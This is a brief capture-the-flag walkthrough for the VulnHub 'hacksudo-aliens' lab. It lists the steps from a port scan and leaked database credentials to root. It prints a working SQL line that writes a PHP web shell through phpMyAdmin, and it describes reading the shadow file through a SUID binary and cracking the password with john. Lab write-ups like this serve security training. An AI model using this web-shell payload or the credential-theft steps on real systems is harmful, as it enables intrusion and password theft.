https://www.vulnhub.com/entry/hacksudo-aliens,676/
Scan ports.
Scan port 80.
In /backup/mysql.bak, found credentials.
Log in phpmyadmin at port 9000 using this credentials. Create a shell php.
SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell.php"
Get reverse shell.
Check SUID files.
Use date to read shadow.
Crack hacksudo's passwd using john.
Log inssh as hacksudo, check SUID files again.
Get root.